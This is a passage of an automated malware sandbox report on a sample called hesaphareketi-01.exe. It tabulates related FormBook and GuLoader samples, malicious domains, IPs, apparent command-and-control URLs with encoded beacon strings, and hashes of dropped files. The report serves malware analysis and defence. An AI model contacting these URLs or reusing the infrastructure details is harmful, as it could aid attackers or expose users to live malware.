                                                    • Successful, ratio: 89%
                                                    • Number of executed functions: 105
                                                    • Number of non-executed functions: 246
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .exe
                                                    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                                    Warnings

                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
                                                    • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, login.live.com, tse1.mm.bing.net, ctldl.windowsupdate.com, settings-win.data.microsoft.com, g.bing.com, nexusrules.officeapps.live.com, arc.msn.com
                                                    • Execution Graph export aborted for target hesaphareketi-01.exe, PID 1380 because there are no executed function
                                                    • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                    • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    12:03:59API Interceptor40282184x Sleep call for process: SearchProtocolHost.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    37.97.254.27New_Order.exeGet hashmaliciousFormBookBrowse
                                                    • www.wrautomotive.online/fdo5/?540H2x=tmpHADT4fdGVd6nnK8VfxTcjTEmAMjvmemW+C4Ol5iYH1IbYxa+keO9dRydEANAVQTW4GcRzv85KoC+8HtmJLO5vdlfv2fS0QQ==&fXUX=ShJ8DFcXvtj84pw
                                                    PO_YTWHDF3432.exeGet hashmaliciousFormBookBrowse
                                                    • www.wrautomotive.online/ahec/
                                                    PO_CCTEB77.exeGet hashmaliciousFormBookBrowse
                                                    • www.wrautomotive.online/ahec/?KHcH=5igDJT3zPYxoznSYBBpd18gTi2dx8KCRz+D9mmXj9CLVcvHmJGefSTTLw3ACEWBDJ4ZMU5QrLRnI3LOtkf+zzorQEnBYkPkOfg==&Vjk=-N-tntX
                                                    Fpopgapwdcgvxn.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                    • www.kermisbedrijfkramer.online/ao65/?3f94p=Y9yn8u0REY9c1IpGc1acQeiywl67Bz4kR9nr06rl/WLBU1XMoiFOUgbvS2/Y+YwQBdR3MSzENA==&ojq4i=mFNh5n78I22D3DgP
                                                    Product_Specs.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • www.wrautomotive.online/ur4g/?vxM0=G80Xg2gxjV&eh=GM1abjaFQeRWF1TbL/6IPq6IQ8Zq6L6A/eGtDh+rzhSfkUEKySbsXXOahwAFIXwkymySVlBBxGC7SDgkYy5RlvrvRaU4SsaPnA==
                                                    PO_VCFGA1010.exeGet hashmaliciousFormBookBrowse
                                                    • www.wrautomotive.online/ahec/?TrRXYB=5igDJT3zPYxoznSYBBpd18gTi2dx8KCRz+D9mmXj9CLVcvHmJGefSTTLw3ACEWBDJ4ZMU5QrLRnI3LOtkf+z0orNAnxbm6AOaCZvJNva1SPD&NRpHp=DLPh_Z
                                                    25-23PJSM-653.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • www.rocsys.net/uaaq/?Zvo88=ZvgtLzuC5J0fwHYuRehKE7pqe+TegS3vAv4ZEylVZ8S9BUo4tJK/O+Yy7erX60uFZvklPnpu2szjI2ePXJ09nWZe2eIrY7ioDA==&5j=JXHP5xY8
                                                    PAGAMENTO_INV-85732.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                    • www.qa-manny.com/cvps/?ojQxW=_LZhZtRhEB2XP&-Lkxp=YYStJbUf5TaZehAWHAdvcDwKkN8dqWyQyqo9RJP/Q7ViCmgow6wyh8/3RNpMerc2KWMLTTY6CI9NpXl7SvcbIbeUXgqX6DnaKg==
                                                    file.exeGet hashmaliciousFormBookBrowse
                                                    • www.wrautomotive.online/fdo5/?7F=tmpHADT4fdGVd6nnK8VfxTcjTEmAMjvmemW+C4Ol5iYH1IbYxa+keO9dRydEANAVQTW4GcRzv85KoC+8HtmJLO5vdlfv2fS0QQ==&zf7=WxIPUXb0
                                                    Order_confirmation,_Invoice.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                    • www.kermisbedrijfkramer.online/ao65/?Urwl=Y9yn8u0REY9c1IpGc1acQeiywl67Bz4kR9nr06rl/WLBU1XMoiFOUgbvS2/Y+YwQBdR3MSzENA==&S0GhC=_R-phJeXT
                                                    INV#761538.exeGet hashmaliciousFormBookBrowse
                                                    • www.qa-manny.com/cvps/?kDuhz=t6NP562HYH_&pf5=YYStJbUf5TaZehAWHAdvcDwKkN8dqWyQyqo9RJP/Q7ViCmgow6wyh8/3RNpMerc2KWMLTTY6CI9NpXl7SvcbIbeUXgqX6DnaKg==
                                                    137-AGROCHLOPECKI_OFFER_list.xlsGet hashmaliciousFormBookBrowse
                                                    • www.rocsys.net/g81o/?t8F43Dx=Xpn7ovWGDL38rcQsVj9M+fSKcj+67g3pDTSuqHneUyb3n+qAvdqStutd5ioDJ87L1Kdi6p0jXbywk+j2nUztgIlZl1ilwP64qP32EII=&xphPK=azPpsjMX1
                                                    NNL_PO_1023008.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • www.rocsys.net/uaaq/?w89D=LxmD0p&UX=ZvgtLzuC5J0fwHYxUOhDE7BocrPe2y3vAv4ZEylVZ8S9BUo4tJK/O+Yy7erX60uFZvklPnpu2szjI2ePXJ09mUhv++5catqsVQ==
                                                    003425425124526.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                    • www.kermisbedrijfkramer.online/ao65/?GR0=Y9yn8u0REY9c1IpGc1acQeiywl67Bz4kR9nr06rl/WLBU1XMoiFOUgbvS1HIoJcoA9wm&IDK=RJBh5RS0IZO8zhrP
                                                    Document.exeGet hashmaliciousFormBookBrowse
                                                    • www.qa-manny.com/cvps/?Tb-PA8s8=YYStJbUf5TaZehAWHAdvcDwKkN8dqWyQyqo9RJP/Q7ViCmgow6wyh8/3RNpMerc2KWMLTTY6CI9NpXl7SvcbIbeUXgqX6DnaKg==&0H=BrFhG8npvv
                                                    Hubnnuiisapctu.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                    • www.kermisbedrijfkramer.online/ao65/?2d=Y9yn8u0REY9c1IpGc1acQeiywl67Bz4kR9nr06rl/WLBU1XMoiFOUgbvS2/hhpQTPLNwMSzDew==&3fC=vZeTzRlX84SHE
                                                    Invoice.exeGet hashmaliciousUnknownBrowse
                                                    • www.wrautomotive.online/9hnx/?qjEABCG=x93wZY5flbcWgBQ+QBIan4Q/Fzujwl2X6zdiZc2Bln/4Iyn/0F+0HT2oZzLfP234arynxKxgoTzQXViUvY11cUD95//AJ74tDA==&KD=eYDR
                                                    Factura_1-000816pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • www.vdb2b.com/hedt/?iOOH=EEEIB&iC8-0=zKoVcsC5grZr6pX8QDgaiztoD/aYyGD3cWBaSuIr6nSXyRLF9phHpQybJRV7E4N8LdJP/dJhO/XvQgvS05+WXwT8k1ve1mAG6g==
                                                    PO-230803-S00.exeGet hashmaliciousFormBookBrowse
                                                    • www.carfactsandfigures.com/gpc9/?pfD=BKcV00kv5fthcsbc5kU6zPs22ZTUClXvYH44oRN9PBAu/J6uiY+GzzbdjWgGYpN/YmmZe7PBk+WcxYFhT8+AoQOkRQ9xiXX9HyxRaD3/mCeI&28=XrcXTyOAOYd9aU4
                                                    Proof_Of_Payment_&_Proforma_Invoice.exeGet hashmaliciousFormBookBrowse
                                                    • www.carfactsandfigures.com/gpc9/?Qw=BKcV00kv5fthcsbc5kU6zPs22ZTUClXvYH44oRN9PBAu/J6uiY+GzzbdjWgGYpN/YmmZe7PBk+WcxYFhT8+AoWCpUiVji2f5FixRaDjUrieI&Cq=oXbgvbGl

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    parkingpage.namecheap.comPI_and_payment_confirmed_pdf.exeGet hashmaliciousFormBook, DBatLoaderBrowse
                                                    • 91.195.240.19
                                                    Inquiry_1100735.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • 91.195.240.19
                                                    OUR_RFQ_DETAILS.exeGet hashmaliciousFormBookBrowse
                                                    • 91.195.240.19
                                                    Dev-Quotation_Request_Q7688T.exeGet hashmaliciousFormBookBrowse
                                                    • 91.195.240.19
                                                    file.exeGet hashmaliciousRedLine, SmokeLoader, StealcBrowse
                                                    • 91.195.240.19
                                                    BRvptajioG.exeGet hashmaliciousRedLine, SmokeLoader, StealcBrowse
                                                    • 91.195.240.19
                                                    Ma0hVedIX4.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                    • 91.195.240.19
                                                    Jooikb3Gb3fksCH.exeGet hashmaliciousFormBookBrowse
                                                    • 91.195.240.19
                                                    recibo_vencimentopdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • 91.195.240.19
                                                    Altogether.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • 91.195.240.19
                                                    Plyshaar.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • 91.195.240.19
                                                    file.exeGet hashmaliciousBitCoin Miner, RedLine, SmokeLoaderBrowse
                                                    • 91.195.240.19
                                                    Advance_payment_against_import_BOE_No._5801890.exeGet hashmaliciousFormBookBrowse
                                                    • 91.195.240.19
                                                    Reverse_Invoice.exeGet hashmaliciousFormBookBrowse
                                                    • 91.195.240.19
                                                    confirm_the_payment.exeGet hashmaliciousFormBookBrowse
                                                    • 91.195.240.19
                                                    DHL_Receipt_AWB811471018477.exeGet hashmaliciousFormBookBrowse
                                                    • 91.195.240.19
                                                    transfer_20231128.exeGet hashmaliciousFormBookBrowse
                                                    • 91.195.240.19
                                                    8319.exeGet hashmaliciousFormBookBrowse
                                                    • 91.195.240.19
                                                    PURCHASE_INQUIRY.exeGet hashmaliciousFormBookBrowse
                                                    • 91.195.240.19
                                                    DHL_#AWB811471048477.exeGet hashmaliciousFormBookBrowse
                                                    • 91.195.240.19
                                                    www.resolution-pj.com25-23PJSM-653.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • 133.130.64.24
                                                    NNL_PO_1023008.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • 133.130.64.24
                                                    www.viough.com25-23PJSM-653.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • 163.197.216.134
                                                    NNL_PO_1023008.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • 163.197.216.134
                                                    www.dabblefurnishings.space25-23PJSM-653.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • 66.96.162.139
                                                    137-AGROCHLOPECKI_OFFER_list.xlsGet hashmaliciousFormBookBrowse
                                                    • 66.96.162.139
                                                    NNL_PO_1023008.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • 66.96.162.139
                                                    Request_List.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • 66.96.162.139

                                                    ASNs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    PEGTECHINCUSRFQ#_RE-S327_Supply_SA-19.exeGet hashmaliciousFormBookBrowse
                                                    • 107.148.22.17
                                                    vvV3pyLNs0.elfGet hashmaliciousMiraiBrowse
                                                    • 156.247.42.62
                                                    REQUEST FOR 01-DEC 2023.exeGet hashmaliciousFormBookBrowse
                                                    • 107.148.17.192
                                                    SecuriteInfo.com.Win32.Evo-gen.20184.6826.exeGet hashmaliciousUnknownBrowse
                                                    • 108.186.198.12
                                                    SecuriteInfo.com.Win32.Evo-gen.20184.6826.exeGet hashmaliciousUnknownBrowse
                                                    • 108.186.198.12
                                                    DocScan 105811-26.exeGet hashmaliciousFormBookBrowse
                                                    • 107.148.17.192
                                                    DocScan 814-1125-2023.exeGet hashmaliciousFormBookBrowse
                                                    • 107.148.17.192
                                                    transfer_2023.11.29.exeGet hashmaliciousFormBookBrowse
                                                    • 107.149.180.240
                                                    confirm_the_payment.exeGet hashmaliciousFormBookBrowse
                                                    • 108.186.149.242
                                                    http://137.175.17.172:1443/ac3.jarGet hashmaliciousUnknownBrowse
                                                    • 137.175.17.172
                                                    Semiconformist.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                    • 172.93.164.28
                                                    transfer_20231128.exeGet hashmaliciousFormBookBrowse
                                                    • 192.74.243.120
                                                    DXm3A32mtI.elfGet hashmaliciousMiraiBrowse
                                                    • 154.84.252.65
                                                    transfer_20231124.exeGet hashmaliciousFormBookBrowse
                                                    • 107.149.180.240
                                                    QWZ-5664789.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                    • 172.93.164.28
                                                    RE_URGENT_INQUIRY_RFQ-03918.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                    • 172.93.164.28
                                                    DHL_Document_11221023.exeGet hashmaliciousFormBookBrowse
                                                    • 107.148.17.192
                                                    SecuriteInfo.com.Win32.PWSX-gen.29998.25521.exeGet hashmaliciousFormBookBrowse
                                                    • 142.4.122.102
                                                    DHL9407155789.exeGet hashmaliciousFormBookBrowse
                                                    • 107.148.17.192
                                                    25-23PJSM-653.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • 163.197.216.134
                                                    TRANSIP-ASAmsterdamtheNetherlandsNLjklarm.elfGet hashmaliciousMiraiBrowse
                                                    • 149.210.199.50
                                                    Znuvgbtsedoszb.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                    • 86.105.245.69
                                                    New_Order.exeGet hashmaliciousFormBookBrowse
                                                    • 37.97.254.27
                                                    PO_YTWHDF3432.exeGet hashmaliciousFormBookBrowse
                                                    • 37.97.254.27
                                                    PO_CCTEB77.exeGet hashmaliciousFormBookBrowse
                                                    • 37.97.254.27
                                                    Fpopgapwdcgvxn.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                    • 37.97.254.27
                                                    Product_Specs.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • 37.97.254.27
                                                    PO_VCFGA1010.exeGet hashmaliciousFormBookBrowse
                                                    • 37.97.254.27
                                                    25-23PJSM-653.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • 37.97.254.27
                                                    PAGAMENTO_INV-85732.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                    • 37.97.254.27
                                                    file.exeGet hashmaliciousFormBookBrowse
                                                    • 37.97.254.27
                                                    kTnqWHyjjG.elfGet hashmaliciousMiraiBrowse
                                                    • 95.170.75.142
                                                    Order_confirmation,_Invoice.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                    • 37.97.254.27
                                                    ZenY9BAc8B.elfGet hashmaliciousMiraiBrowse
                                                    • 185.211.251.125
                                                    F00D0B21M4.elfGet hashmaliciousMiraiBrowse
                                                    • 37.97.214.109
                                                    INV#761538.exeGet hashmaliciousFormBookBrowse
                                                    • 37.97.254.27
                                                    137-AGROCHLOPECKI_OFFER_list.xlsGet hashmaliciousFormBookBrowse
                                                    • 37.97.254.27
                                                    QISOVbNi9M.elfGet hashmaliciousMiraiBrowse
                                                    • 95.170.75.168
                                                    NNL_PO_1023008.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • 37.97.254.27
                                                    003425425124526.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                    • 37.97.254.27

                                                    JA3 Fingerprints

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    37f463bf4616ecd445d4a1937da06e19RFQ_GEC-2804.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • 142.250.65.174
                                                    • 142.251.40.129
                                                    Ziraat_Bankasi_Swift_Mesaji.pdf.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                    • 142.250.65.174
                                                    • 142.251.40.129
                                                    Sales_Contract_DC-HHP-046.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                    • 142.250.65.174
                                                    • 142.251.40.129
                                                    CijE923xjU.exeGet hashmaliciousVidarBrowse
                                                    • 142.250.65.174
                                                    • 142.251.40.129
                                                    Wishes for our journey December 2023.scrGet hashmaliciousVidarBrowse
                                                    • 142.250.65.174
                                                    • 142.251.40.129
                                                    UYUuh7vsdN.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, RedLine, SmokeLoader, VidarBrowse
                                                    • 142.250.65.174
                                                    • 142.251.40.129
                                                    Aaca8T1ZJ5.exeGet hashmaliciousBabuk, Djvu, RedLine, SmokeLoader, VidarBrowse
                                                    • 142.250.65.174
                                                    • 142.251.40.129
                                                    file.exeGet hashmaliciousAmadey, Djvu, Glupteba, Petite Virus, RedLine, SmokeLoader, Socks5SystemzBrowse
                                                    • 142.250.65.174
                                                    • 142.251.40.129
                                                    O7Bptb2MyD.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, RedLine, SmokeLoader, VidarBrowse
                                                    • 142.250.65.174
                                                    • 142.251.40.129
                                                    BpOyVCAP8g.msiGet hashmaliciousLummaC StealerBrowse
                                                    • 142.250.65.174
                                                    • 142.251.40.129
                                                    CmR9157001.exeGet hashmaliciousGuLoaderBrowse
                                                    • 142.250.65.174
                                                    • 142.251.40.129
                                                    CmR9157001.exeGet hashmaliciousGuLoaderBrowse
                                                    • 142.250.65.174
                                                    • 142.251.40.129
                                                    Winlock.exeGet hashmaliciousUnknownBrowse
                                                    • 142.250.65.174
                                                    • 142.251.40.129
                                                    file.exeGet hashmaliciousBabuk, DjvuBrowse
                                                    • 142.250.65.174
                                                    • 142.251.40.129
                                                    svcservice.exeGet hashmaliciousNetSupport RATBrowse
                                                    • 142.250.65.174
                                                    • 142.251.40.129
                                                    yW9taCl44h.exeGet hashmaliciousRedLine, SectopRATBrowse
                                                    • 142.250.65.174
                                                    • 142.251.40.129
                                                    s6n00Z3C86.exeGet hashmaliciousBabuk, Clipboard Hijacker, DCRat, Djvu, RedLine, SmokeLoader, zgRATBrowse
                                                    • 142.250.65.174
                                                    • 142.251.40.129
                                                    JYAtBufpV4.exeGet hashmaliciousDCRat, Djvu, RedLine, SmokeLoader, zgRATBrowse
                                                    • 142.250.65.174
                                                    • 142.251.40.129
                                                    jDmQ0fSgg6.exeGet hashmaliciousVidarBrowse
                                                    • 142.250.65.174
                                                    • 142.251.40.129
                                                    #U8d85#U7ea7#U6587#U672cTXT.exeGet hashmaliciousAsyncRAT, DcRat, VenomRATBrowse
                                                    • 142.250.65.174
                                                    • 142.251.40.129

                                                    Dropped Files

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    C:\Users\user\AppData\Local\Temp\nsj313A.tmp\LangDLL.dllLiquidacion_por_Factorizacion_de_Creditos.exeGet hashmaliciousGuLoaderBrowse
                                                      Technical_Offer.exeGet hashmaliciousGuLoaderBrowse
                                                        justificantePago_es_180214093508pdf.exeGet hashmaliciousGuLoaderBrowse
                                                          00158007317748300pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            475128640_20231129152352507pdf.exeGet hashmaliciousGuLoaderBrowse
                                                              recibo_vencimentopdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                justificantePago_es_180214093508pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                  00158007317748300pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                    475128640_20231129152352507pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                      recibo_vencimentopdf.exeGet hashmaliciousGuLoaderBrowse
                                                                        Ticari_Hesap_#U00d6zetinizpdf.exeGet hashmaliciousGuLoaderBrowse
                                                                          Transferencia-16.280,00_EURpdf.exeGet hashmaliciousGuLoaderBrowse
                                                                            Ticari_Hesap_#U00d6zetinizpdf.exeGet hashmaliciousGuLoaderBrowse
                                                                              Transferencia-16.280,00_EURpdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                84LQ5L8BA4.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                  84LQ5L8BA4.exeGet hashmaliciousGuLoaderBrowse

                                                                                    Created / dropped Files

                                                                                    C:\Users\user\AppData\Local\Temp\53s9401

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\SearchProtocolHost.exe
                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3041002, page size 2048, file counter 3, database pages 92, cookie 0x3a, schema 4, UTF-8, version-valid-for 3
                                                                                    Category:dropped
                                                                                    Size (bytes):188416
                                                                                    Entropy (8bit):0.9926780404836638
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:mavrNdl9bH9KTj8bGA/D3n0mCTV3U25G4qWlrrFB3nKIq9ucs:mavrbl9D9TDn0mCTV3PG43lrfKIq9ps
                                                                                    MD5:BE092D0FC1A86091764AABD40B25CB9E
                                                                                    SHA1:1372556BBC211898F393CC02C4285705AACAE3D7
                                                                                    SHA-256:3A83C0434C667BB30FD9D85D908E652A2569239BBD61079849F299409A48D545
                                                                                    SHA-512:EA6D16D484395A05D836A066248D355DA4C3C7A7B11CA612A87535395C6FDDDF1171624B6B45E41C12C284B5213CE9D22450E212ED0D195280653A4DF19F7892
                                                                                    Malicious:false
                                                                                    Reputation:moderate, very likely benign file
                                                                                    Preview:SQLite format 3......@ .......\...........:......................................................f............\........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\Temp\Undige\Chowderheaded\ukyndighed\Asymmetrically\sculp.gas

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\hesaphareketi-01.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):2781
                                                                                    Entropy (8bit):4.840941020704911
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:8BQ9pjaSuu0rGToZO5rtrQwgU1vXpAt1gjv4PoG:8BQbeSv0rGToc5rtr1Rv5AwG
                                                                                    MD5:7750DF455D3D7A43FAB608842DBC68BB
                                                                                    SHA1:75A12EE3889D27032ACEA11A69194F510E49CCAF
                                                                                    SHA-256:933A1AE85E63D6F80732C94FB04E624C0C0C30C33A1D260E6BCBBB6964EC9368
                                                                                    SHA-512:CE971CDD65C5256A2CB3E75D9BEA4C539C39D8EC892A032F2CCB082934C6AD6AB3DBB5B24B6317809B08D83F9511FB55B23BDB2D26CED8B1ACC422E89377181C
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Preview:.]......j.....nY..A.............P.......*..I...................$.....2..S....q@.......J.c.Q.%....|..\..y.f.w..k.....r...............................x6.............h.d.......t...?L............c0\..B.q..!Q.{..N.......@.............~H....Z......,.........]..................Q..._.....2................KRA.......W.........................S\...........o...............b..V..E.......... . ....n....k..............M...r.........S..fZ....`.4.B..+.....gMx..U.........e .....up'.....'............)...........(...~.;.e&....O......|qE......&.#.........W0O.t..p....#...+....7.......nq...a.Rc.g..D.....h.Z......'..u.........\..J.v...........w......H.,..................x1....}........U...............t.l.T......J...........m..f......O.....%.]...........W............C..................8...............0.X........x....|...........o..#D..<..-..........C...}........I.[....}........qp.k.....H........Ma...9..;.......5...............h.ym......b......$....Ud.................h....w.....#....g.c...........

                                                                                    C:\Users\user\AppData\Local\Temp\Undige\Efterlignelsens\Minileagues\Bestillingsarbejde.joy

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\hesaphareketi-01.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):2061
                                                                                    Entropy (8bit):4.657149228813482
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:MKhcDmUp3MAx9x9Pxg8LuSNcedwv/f5JIh+61:MKedh9u4dK5q+c
                                                                                    MD5:815D1863FAE5184E2F64CDB3077B0713
                                                                                    SHA1:A5C38DF4631DC52B0F9C4391E13AD35C0196DE4D
                                                                                    SHA-256:CCF91454085A567DF894F4AB7466F165BB641DC627B388A8BF0275C60B9D562E
                                                                                    SHA-512:DE5F65FC66CA4660E3F5337CD3557B8DAC968AE7CF038FEC7E6F3C768979CCD91035D76799988AAFECD1E4C545ECD53E38DA54E13B76D2040A486B3B71157616
                                                                                    Malicious:false
                                                                                    Preview:....[.|.....:.....E.......g....Y.m.z..6Jc.=..W.P..V...............M..E.M..tg...........+.\....?...O......|..A.....c..gp...................j.....=......X...............Y...R...(6....L...r.......H.H..h.?.......7..F.........zz2x........]..............>. ..@.9...BN......._l.............+...`.C..4.m....7r..........:.....C...........k.................../........=......X....<.......Ml........t..m..V....N../....................^....F..........M.....F.....|...........J..Pj....d..........4.....F.f...b...M....................,.*.....T.........h...".......x.p....J................................".........2......A.....;e..................5...P....9.....z).....H......J...w.......(.s...............W...{...J....O....j..................:...q.................t..|.....S.4:.r.... .....g.,..M..-...X.S$..j......`...AE..w./.j..jV.k...0.J...t.....k.....b.$.1.........p............L.G.Z......(..'b...7.......u..1O....A..g..........................:..A....................]..l.....].............F.......

                                                                                    C:\Users\user\AppData\Local\Temp\Undige\Emblemizing.Amn178

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\hesaphareketi-01.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):228797
                                                                                    Entropy (8bit):7.8433904827520795
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:q+1AzL6nQir4rKHfZXCSaaElUS+1i/t9BGsv/HFV36H5:bGqnZ0rmXCSaplUj149IsvP6Z
                                                                                    MD5:12C462CBA24C9BF13A8089C361D9A556
                                                                                    SHA1:8A4ABA3C2D4850AB44703AD391EB78B8BDADDF8C
                                                                                    SHA-256:C6B868D512822A2A57C080E5CF6E236DAB2FB3A7D6AD242A16EDC6E47E5204E4
                                                                                    SHA-512:4EF8125436BCECF3D2A3DB2DDE4AE9A193D537748DD586AE8C72BCF3C4FBA873E5CB2EC6A889ADB7355EA02BCD2D2CE22F0C2FBD34569651A38C218E754C1A18
                                                                                    Malicious:false
                                                                                    Preview:...&...........3.......y..xx.s....BBBBBBBBB.........................S...............5........................EE........._____.D....4..........z....F...77....(((....h...........22222........................JJ................................................hh.............................=......@.....................................DD......dd....................s......LLLL.."............ll.....++...|........K.z...........yy.??.............((((.......................@......ff.........@..|........................G.2...F..&&&&.......\\...//.....I........t.jjjjjjjj..........Y....................................---...............4....cc./...]..............w........g.....9....ooo.................................S.[...bb...WW.......hh.....H................uu.......jjjj.....................x.h...II.....5555.w...u.......==......<............~~~~....00000.>>>>.Z............qqq.............J.....o......................B.....n.......E...............0...........................H....r."........ee......

                                                                                    C:\Users\user\AppData\Local\Temp\Undige\Fingal\galantes.fil

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\hesaphareketi-01.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):2054
                                                                                    Entropy (8bit):4.918068581931502
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:jC66pPwks6AiTHuu8Ben4KPItcYV/e3ZvECFbrily:ZEAiTqBWM6xECFbeQ
                                                                                    MD5:2CE1B6D5678CECBD0045D9F0BEA70012
                                                                                    SHA1:D218A03E35DC8C0467C7157853B836B14E17EE2B
                                                                                    SHA-256:02354809D06CDD8BC242C8C37C5F2E3BFFD7B083F3AA616B0CD1D70A1705DB84
                                                                                    SHA-512:065BF6683294248591CF7B58AA77881117D60759DC1F36C72D9A113D489F0C4C25D44CDFED9506531D8412724A3A83A68992236A7077C6AEA67437AC37DCFD3D
                                                                                    Malicious:false
                                                                                    Preview:..|.h...7.....h....m.....d..t.........l..[.i&.....[.....p.....Z......3........................o...)...{...f...T._........}....b.......T........C.....r...v........\'....`.ub......%l..............................j.....4.Z...C........I.Dq.................[......?..S....y...y...............Q..9)....x...........>.[5.N.!.A..u.W....g.......;.....9.................7....2.....a......)x..................H......C...'.. WP....T..:..........`...Z.n..E.^...KY...........=....J.........(Y.......<............w.Z.....@.B......I...tj......dm+i..*....*.....7.......2.......DR...ly.."R.......N.....Y.............:.<..........=.....1......7;.A.U.i.......................0...o.....w......Q.p].`.....y.qn..............c....................*...........y....!....................p.......}\Z.M.(.6..F............G.....<>.............E=.......2..j.h...$........j..vq.6...|...\.~sCh...M.......1...b........8........\..E.........1.L.^8.s.U......0......*S........v.h...A......U....+.P.MQ.m....W.......$...

                                                                                    C:\Users\user\AppData\Local\Temp\Undige\Fingal\idrtsparker.arg

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\hesaphareketi-01.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1024
                                                                                    Entropy (8bit):4.8135073433567985
                                                                                    Encrypted:false
                                                                                    SSDEEP:24://RG1YukWldU0PBQbj9HaCTztr1kXOLxgs4/VQ5Hq:/EjpdU0PBQbhHltOXOLxjCK8
                                                                                    MD5:CCB8C7C324C0AFE87803AF762CD0587C
                                                                                    SHA1:CD632598A0452F28BE6AE7325D714AF31D177144
                                                                                    SHA-256:52816BC56069BF3514DA74567A1FDD7463183D11583D5F11B442960AA12B57D9
                                                                                    SHA-512:76A7504B1033BBE0A8C300D8414EA45D272E58AE56CE5E4917C24E9AF12FD17DE6B9B34F26D6BC312D8340484AD59CFD469FCEA4CA4BD354FFF468F0BF66CE94
                                                                                    Malicious:false
